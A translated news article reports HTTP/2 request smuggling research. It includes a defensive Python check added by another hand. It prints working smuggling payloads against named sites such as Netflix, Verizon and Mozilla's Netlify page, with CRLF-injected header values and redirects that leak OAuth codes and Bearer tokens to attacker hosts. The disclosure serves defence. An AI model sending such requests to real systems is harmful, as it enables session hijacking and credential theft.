New attack on frontend-backend systems that allows wedging into other users' requests

Web systems in which the frontend accepts connections over HTTP/2 and forwards them to the backend over HTTP/1.1 have been shown to be vulnerable to a new variant of the "HTTP Request Smuggling" attack, which allows an attacker, by sending specially crafted client requests, to wedge into the content of other users' requests processed in the same flow between the frontend and the backend. The attack can be used to inject malicious JavaScript code into a session with a legitimate website, bypass access control systems, and intercept authentication parameters.

The problem affects web proxies, load balancers, web accelerators, content delivery systems and other configurations in which requests are relayed in a frontend-backend scheme. The author of the study demonstrated attacks on the systems of Netflix, Verizon, Bitbucket, the Netlify CDN and Atlassian, and received $56,000 through bug bounty programs for identifying the vulnerabilities. The problem has also been confirmed in F5 Networks products. The problem partially affects mod_proxy in the Apache http server (CVE-2021-33193); a fix is expected in version 2.4.49 (the developers were notified of the problem in early May and were given 3 months to fix it). In nginx, the ability to specify the "Content-Length" and "Transfer-Encoding" headers at the same time was blocked in the latest release (1.21.1). Attack tools are already included in the Burp toolkit and are available in the form of the Turbo Intruder extension.

The operating principle of the new method of wedging into traffic is similar to the vulnerability identified by the same researcher two years ago, which was limited to frontends accepting requests over HTTP/1.1. Recall that in the frontend-backend scheme, client requests are received by an additional node, the frontend, which establishes a long-lived TCP connection to the backend that actually processes the requests. Over this shared connection, requests from different users are normally transmitted one after another in a chain, separated by means of the HTTP protocol.

The classic "HTTP Request Smuggling" attack was based on the fact that the frontend and the backend interpret the HTTP headers "Content-Length" (specifies the total size of the data in the request) and "Transfer-Encoding: chunked" (allows the data to be transferred in parts) differently. For example, if the frontend supports only "Content-Length" but ignores "Transfer-Encoding: chunked", an attacker can send a request containing both "Content-Length" and "Transfer-Encoding: chunked", where the size in "Content-Length" does not match the size of the chunked chain. In this case, the frontend will process and forward the request according to "Content-Length", while the backend will wait for the block to complete based on "Transfer-Encoding: chunked", and the remaining tail of the attacker's request will end up at the beginning of someone else's request transmitted next.

Unlike the text-based HTTP/1.1 protocol, which is parsed line by line, HTTP/2 is a binary protocol and operates on data blocks of predetermined size. Nevertheless, HTTP/2 uses pseudo-headers that correspond to ordinary HTTP headers. When interacting with the backend over HTTP/1.1, the frontend translates these pseudo-headers into the equivalent HTTP/1.1 headers. The problem is that the backend makes decisions about splitting the stream based on the HTTP headers set by the frontend, without having any information about the parameters of the original request.

In particular, "content-length" and "transfer-encoding" values can be transmitted in the form of pseudo-headers, even though they are not used in HTTP/2, where the size of all data is set in a separate field. However, during the conversion of an HTTP/2 request to HTTP/1.1, these headers are carried over and can confuse the backend. There are two main variants of the attack, H2.TE and H2.CL, in which the backend is misled by a transfer-encoding or content-length value that does not correspond to the actual size of the request body received by the frontend over HTTP/2.


An example of the H2.CL attack is specifying an incorrect size in the content-length pseudo-header when sending an HTTP/2 request to Netflix. This request leads to the addition of an equivalent Content-Length HTTP header when the backend is accessed over HTTP/1.1, but since the size in Content-Length is smaller than the actual one, part of the data at the tail is processed as the beginning of the next request.

For example, the HTTP/2 request

    :method POST
    :path /n
    :authority www.netflix.com
    content-length 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

will cause the following request to be sent to the backend:

    POST /n HTTP/1.1
    Host: www.netflix.com
    Content-Length: 4

    abcdGET /n HTTP/1.1
    Host: 02.rs?x.netflix.com
    Foo: bar

Since Content-Length has the value 4, the backend will accept only "abcd" as the request body, and the rest, "GET /n HTTP/1.1...", will be processed as the beginning of the next request, which belongs to another user. Accordingly, the stream becomes desynchronized, and in response to the next request the result of processing the dummy request will be returned. In the case of Netflix, specifying a third-party host in the "Host:" header of the dummy request caused the client to receive the response "Location: https://02.rs?x.netflix.com/n", which allowed arbitrary content to be delivered to the client, including execution of the attacker's own JavaScript code in the context of the Netflix site.

The second attack variant (H2.TE) involves substituting the "Transfer-Encoding: chunked" header. Use of the transfer-encoding pseudo-header in HTTP/2 is prohibited by the specification, and requests containing it are required to be treated as invalid. Despite this, some frontend implementations do not take this requirement into account and allow the transfer-encoding pseudo-header in HTTP/2, converting it into the equivalent HTTP header. If a "Transfer-Encoding" header is present, the backend may give it higher priority and split the data piece by piece in "chunked" mode using blocks of varying size in the format "{size}\r\n{block}\r\n{size}\r\n{block}\r\n0", ignoring the original division by total size.

The presence of such a gap was demonstrated using Verizon as an example. The problem concerned the authentication portal and content management system, which is also used on sites such as the Huffington Post and Engadget. For example, the client's HTTP/2 request:

    :method POST
    :path /identity/XUI
    :authority id.b2b.oath.com
    transfer-encoding chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

results in the following HTTP/1.1 request being sent to the backend:

    POST /identity/XUI HTTP/1.1
    Host: id.b2b.oath.com
    Content-Length: 66
    Transfer-Encoding: chunked

    0

    GET /oops HTTP/1.1
    Host: psres.net
    Content-Length: 10

    x=

The backend, in turn, ignored the "Content-Length" header and split the stream based on "Transfer-Encoding: chunked". In practice, the attack made it possible to redirect users' requests to the attacker's site, including intercepting requests related to OAuth authentication, whose parameters were exposed in the Referer header, as well as imitating an authentication session and causing the user's system to send credentials to the attacker:

    GET /b2blanding/show/oops HTTP/1.1
    Host: psres.net
    Referer: https://id.b2b.oath.com/?…&code=secret

    GET / HTTP/1.1
    Host: psres.net
    Authorization: Bearer eyJhcGwiOiJIUzI1GicCI1sIkIk6…

To attack HTTP/2 implementations that do not allow the transfer-encoding pseudo-header to be specified, another method was proposed, which substitutes the "Transfer-Encoding" header by appending it to other pseudo-headers after a newline (when converted to HTTP/1.1, this produces two separate HTTP headers).

For example, Atlassian Jira and the Netlify CDN (used to serve the Firefox start page for Mozilla) were affected by this problem. In particular, the HTTP/2 request

    :method POST
    :path /
    :authority start.mozilla.org
    foo b\r\n
    transfer-encoding: chunked

    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

led to the following HTTP/1.1 request being sent to the backend:

    POST / HTTP/1.1\r\n
    Host: start.mozilla.org\r\n
    Foo: b\r\n
    Transfer-Encoding: chunked\r\n
    Content-Length: 71\r\n
    \r\n
    0\r\n
    \r\n
    GET / HTTP/1.1\r\n
    Host: evil-netlify-domain\r\n
    Content-Length: 5\r\n
    \r\n
    x=

Another option for substituting the "Transfer-Encoding" header was to append it to the name of another pseudo-header or to the request method line. For example, when accessing Atlassian Jira, the pseudo-header name "foo:bar\r\ntransfer-encoding" with the value "chunked" caused the HTTP headers "foo:bar" and "transfer-encoding: chunked" to be added, and setting the ":method" pseudo-header to the value "GET / HTTP/1.1\r\nTransfer-encoding: chunked" was translated into "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
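As an added example (not code from the article or from the research it reports), the following Python models the flawed HTTP/2 to HTTP/1.1 downgrade behind the H2.CL, H2.TE and header-splitting cases described above, and places beside it the checks a frontend should apply before forwarding. The sample requests are rebuilt from the examples on this page; the function names and the sample constants are my own.

```python
# Added example: a model of the flawed HTTP/2 -> HTTP/1.1 downgrade described
# on this page, next to the checks a hardened frontend applies. Not the code of
# any of the affected products.

# Hop-by-hop / framing headers that must never be copied out of HTTP/2
# (RFC 7540 section 8.1.2.2 forbids transfer-encoding in HTTP/2 requests).
FORBIDDEN = {"transfer-encoding", "connection", "keep-alive", "upgrade"}


def naive_downgrade(pseudo, headers, body):
    """Flawed frontend: copies names and values verbatim and, unless the
    client already sent content-length, appends one from the framed body."""
    lines = [f"{pseudo[':method']} {pseudo[':path']} HTTP/1.1",
             f"Host: {pseudo[':authority']}"]
    lines += [f"{name.title()}: {value}" for name, value in headers]
    if not any(n.lower() == "content-length" for n, _ in headers):
        lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def check_h2_request(pseudo, headers, body):
    """Hardened frontend: list the reasons to reject (empty = safe to forward)."""
    problems = []
    fields = list(pseudo.values()) + [s for pair in headers for s in pair]
    for field in fields:
        if "\r" in field or "\n" in field:      # header splitting (Netlify, Jira)
            problems.append(f"CR/LF in field {field!r}")
    for name, value in headers:
        if name.lower() in FORBIDDEN:           # H2.TE
            problems.append(f"forbidden header {name}")
        elif name.lower() == "content-length" and value.strip() != str(len(body)):
            problems.append(f"content-length {value} != body size {len(body)}")  # H2.CL
    return problems


# Constructed samples rebuilt from the three cases on this page.
NETFLIX_H2CL = ({":method": "POST", ":path": "/n", ":authority": "www.netflix.com"},
                [("content-length", "4")],
                b"abcdGET /n HTTP/1.1\r\nHost: 02.rs?x.netflix.com\r\nFoo: bar")
VERIZON_H2TE = ({":method": "POST", ":path": "/identity/XUI", ":authority": "id.b2b.oath.com"},
                [("transfer-encoding", "chunked")],
                b"0\r\n\r\nGET /oops HTTP/1.1\r\nHost: psres.net\r\nContent-Length: 10\r\n\r\nx=")
NETLIFY_CRLF = ({":method": "POST", ":path": "/", ":authority": "start.mozilla.org"},
                [("foo", "b\r\ntransfer-encoding: chunked")],
                b"0\r\n\r\nGET / HTTP/1.1\r\nHost: evil-netlify-domain\r\nContent-Length: 5\r\n\r\nx=")

if __name__ == "__main__":
    for sample in (NETFLIX_H2CL, VERIZON_H2TE, NETLIFY_CRLF):
        print(naive_downgrade(*sample).split(b"\r\n\r\n", 1)[0].decode())
        print("reject:", check_h2_request(*sample), "\n")
```

The naive downgrade reproduces the Content-Length values 66 and 71 shown in the page's Verizon and Netlify examples, while the check rejects all three requests before they reach the backend.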

The researcher who identified the problem also proposed a request tunneling technique for attacking frontends in which each IP address gets its own separate connection to the backend and traffic from different users is not mixed. The proposed technique does not allow wedging into other users' requests, but it makes it possible to poison a shared cache, affecting the processing of other requests, and allows substituting internal HTTP headers used to pass service information from the frontend to the backend (for example, when authentication is performed on the frontend side, such headers can convey information about the current user to the backend). As an example of applying the method in practice, cache poisoning made it possible to gain control over pages in the Bitbucket service.

Source: opennet.ru
